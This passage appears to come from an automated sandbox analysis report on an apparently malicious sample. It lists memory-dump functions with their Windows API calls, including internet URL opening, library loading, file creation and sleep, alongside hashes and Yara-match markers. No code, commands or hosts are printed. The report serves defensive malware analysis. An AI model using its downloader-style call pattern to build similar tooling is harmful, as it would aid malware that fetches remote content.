                              • Opcode ID: 3060c686fb8b5ef760e5da26d33bdd6dc90f1367763eb0ef4c40ee84fe2aafef
                              • Instruction ID: 1874ed5d3f2c9c5881b2794349eee4de3525db55c8681f50762b5f712a3adfef
                              • Opcode Fuzzy Hash: 3060c686fb8b5ef760e5da26d33bdd6dc90f1367763eb0ef4c40ee84fe2aafef
                              • Instruction Fuzzy Hash: 2E312170640742AFF720AF28CC8DFA9BBA1BF04701F218159F945AB1E2D7B4DD80CA51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 005645DC, Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenA.WININET(00564E47,00000000,00000000,00000000,00000000,0056501A,00565374,55E47D79,55E47D79,55E47D79,55E47D79), ref: 005645EA
                              • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564752
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              • Opcode ID: 7eb4d8baa9c9647d97d9a8840cae98320c6f65a49904926dd48686f333ef394d
                              • Instruction ID: 3b2b75795d3e54b8db2a0230f0e51d1f3fcd3e2f1be99142dfe95f769df608e0
                              • Opcode Fuzzy Hash: 7eb4d8baa9c9647d97d9a8840cae98320c6f65a49904926dd48686f333ef394d
                              • Instruction Fuzzy Hash: D8312D3028438AABEF319E54CD45FEE3A65FF00740F508425BE4AAF590DB719A40EB24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056449E, Relevance: 1.6, APIs: 1, Instructions: 146libraryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 005645DC: InternetOpenA.WININET(00564E47,00000000,00000000,00000000,00000000,0056501A,00565374,55E47D79,55E47D79,55E47D79,55E47D79), ref: 005645EA
                                • Part of subcall function 005645DC: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564752
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 00564FA8
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InternetOpen$InitializeThunk
                              • String ID:
                              • API String ID: 518753361-0
                              • Opcode ID: f2f0189025fa37cabbf206bff69a8d6caf283628d09ae8224167706ad55fcc67
                              • Instruction ID: 8dfe74c09177e5dc9e3101055d0685aece9f3035d70de0cc37f7b3baa3e0a001
                              • Opcode Fuzzy Hash: f2f0189025fa37cabbf206bff69a8d6caf283628d09ae8224167706ad55fcc67
                              • Instruction Fuzzy Hash: D9619C77419616DFC648CF24EA6E814BB26FFAA3A0300D399D1141F1FED67419428FD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00564450, Relevance: 1.6, APIs: 1, Instructions: 119libraryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 005645DC: InternetOpenA.WININET(00564E47,00000000,00000000,00000000,00000000,0056501A,00565374,55E47D79,55E47D79,55E47D79,55E47D79), ref: 005645EA
                                • Part of subcall function 005645DC: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564752
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 00564FA8
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InternetOpen$InitializeThunk
                              • String ID:
                              • API String ID: 518753361-0
                              • Opcode ID: f7f833193467ea9ef123d8a0cfa1f263a4e6d422b32ead279d86ec8b8db281ea
                              • Instruction ID: 8208ff7dd20a83770cffdae27d44fd8e7b379f2d821df8b877a03b72fddaedb1
                              • Opcode Fuzzy Hash: f7f833193467ea9ef123d8a0cfa1f263a4e6d422b32ead279d86ec8b8db281ea
                              • Instruction Fuzzy Hash: 9A51F377409656DFC718CF24E669A98BF22FFAA360F008399D0441F2EED6701942CF96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00564406, Relevance: 1.6, APIs: 1, Instructions: 108libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 00564FA8
                                • Part of subcall function 005645DC: InternetOpenA.WININET(00564E47,00000000,00000000,00000000,00000000,0056501A,00565374,55E47D79,55E47D79,55E47D79,55E47D79), ref: 005645EA
                                • Part of subcall function 005645DC: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564752
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InternetOpen$InitializeThunk
                              • String ID:
                              • API String ID: 518753361-0
                              • Opcode ID: fddf752f6fac41f854aabf7f5c35933fbc515557f502978a995c0fb51abcbe90
                              • Instruction ID: 1b934c0b70e6e86419ebfd7f7e278d63feb3bf76412c0ea90b39b5ddf0faca14
                              • Opcode Fuzzy Hash: fddf752f6fac41f854aabf7f5c35933fbc515557f502978a995c0fb51abcbe90
                              • Instruction Fuzzy Hash: D5410C7741A6569FCB08CF24E66AA14BF25FF6A360B008399D0500F1FED6B41902CFD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00564D2A, Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 00564FA8
                                • Part of subcall function 005645DC: InternetOpenA.WININET(00564E47,00000000,00000000,00000000,00000000,0056501A,00565374,55E47D79,55E47D79,55E47D79,55E47D79), ref: 005645EA
                                • Part of subcall function 005645DC: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564752
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InternetOpen$InitializeThunk
                              • String ID:
                              • API String ID: 518753361-0
                              • Opcode ID: ceaf8f5692e68e7cf8b78d5204c188e76f4a515d6d0c064af426f8a36432c51b
                              • Instruction ID: 853d572aefca58a9d0ab8203c7c3c8ea74f4ab332b264ad432c2910fda602d3f
                              • Opcode Fuzzy Hash: ceaf8f5692e68e7cf8b78d5204c188e76f4a515d6d0c064af426f8a36432c51b
                              • Instruction Fuzzy Hash: 7841CE7742A6659F8B48CF24E6AA814BF25FF6A3603009399D0501F1FED5741942CFDA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056463A, Relevance: 1.6, APIs: 1, Instructions: 83networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564752
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              • Opcode ID: 26771013d71bfc1e64ab6595a9daf2c4abf53f988e54993aaa50c47a6dc73f48
                              • Instruction ID: 6edbfd7bfae373e83c966bb2eac37113a31bfeff0a983d143313b2e70457a97f
                              • Opcode Fuzzy Hash: 26771013d71bfc1e64ab6595a9daf2c4abf53f988e54993aaa50c47a6dc73f48
                              • Instruction Fuzzy Hash: 77418E7700420AEFCA68CF14EE59F68BB15FF69360F008325E6181F1EDD6741A428FA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00564449, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 00564FA8
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 3b9be34567b547a335d942730c1fed9570389221b9a72a035870ecd8675f822d
                              • Instruction ID: c576a414768497106133bb4933485afe09cf04fce8b6d4595a1c9d22fb9e6919
                              • Opcode Fuzzy Hash: 3b9be34567b547a335d942730c1fed9570389221b9a72a035870ecd8675f822d
                              • Instruction Fuzzy Hash: 8B21C97B4156169F8648CF24E65E814BB25FFAA370300D396D1141F2FED9742A438FE6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00566D52, Relevance: 1.5, APIs: 1, Instructions: 11libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNELBASE(00564FFA,?,?,0056074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00566D98
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 1390f1346411d48d0962306dc8f17f58410a50f9e9f03bff120d879f12c8c39e
                              • Instruction ID: 93585f49d412f43472199d6014b15065ccd98d2cb6b2c3e1a4615119a01c5c94
                              • Opcode Fuzzy Hash: 1390f1346411d48d0962306dc8f17f58410a50f9e9f03bff120d879f12c8c39e
                              • Instruction Fuzzy Hash: 27C08CA0821000BA99391AB0082CC3F0C28AED5720F005E0CB827A3180456088008272
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056709C, Relevance: 1.5, APIs: 1, Instructions: 10libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNELBASE(00000000,0056263C,00000000,?,?,00000014,?,?,00000014), ref: 005670A3
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: efff87ac3b03003ad2f728d5e5e5d7b1a2429ac66944c1d105547d8fad82e60f
                              • Instruction ID: 51f687b12a603d961cf7132bb555a6ff6bd41acc3c3db3a204ef32ad4f018708
                              • Opcode Fuzzy Hash: efff87ac3b03003ad2f728d5e5e5d7b1a2429ac66944c1d105547d8fad82e60f
                              • Instruction Fuzzy Hash: C9C04C3090010DBF9F015FA0D99C9EE3B27EF40361BD04414FC1684450D771CDA09A11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00563FF4, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00563FD4,0056401A,00560A54,?,?,?,0056074C,2D9CC76C,DFCB8F12), ref: 00564008
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                              • Instruction ID: 90778f157ef074656d7de284b4bab831f576b04e2021a8a1eff49e75729f027a
                              • Opcode Fuzzy Hash: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                              • Instruction Fuzzy Hash: A4C092717E0300B6FA348A208D57F8A62159B90F00F30840877093C0C085F1B610C62C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00565DFC, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                              Download Yara Rule
                              APIs
                              • GetLongPathNameW.KERNELBASE(?,005604EE,00000200,00561C61,?,?,?,?,0056523B,00565200,00561457,?,?,00000004,?,00000000), ref: 00565E0B
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: LongNamePath
                              • String ID:
                              • API String ID: 82841172-0
                              • Opcode ID: 05590cfd3447dced2ec1b2ca25b403dcd4ff7b455290660f6856e5da2b667189
                              • Instruction ID: 1e4b140cf606c8bf0029eb496e81cd6aedcab3da80029c5d0d48980e8bac0d85
                              • Opcode Fuzzy Hash: 05590cfd3447dced2ec1b2ca25b403dcd4ff7b455290660f6856e5da2b667189
                              • Instruction Fuzzy Hash: FBB09275204300BBE650DA10CDC8F5BB7A8BB98700F108804BACA86142C630A804CB21
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00562AC4, Relevance: 1.3, APIs: 1, Instructions: 87sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_00009402,00000000,00000000,00000000), ref: 00562BFB
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 145182cf6f5404f1d4f148bbd6cf84cd02c4f119afbe8a3cbc757f5fa00e6eea
                              • Instruction ID: 247fc9a830bd22978ab93fe0e6b6a6e4305ded10a8a23e6027f73632b81b9c3d
                              • Opcode Fuzzy Hash: 145182cf6f5404f1d4f148bbd6cf84cd02c4f119afbe8a3cbc757f5fa00e6eea
                              • Instruction Fuzzy Hash: 9A31E073405606EFD748CF24EA9EF18BB12FF69360F008355E2142F0FEDA7409428A96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions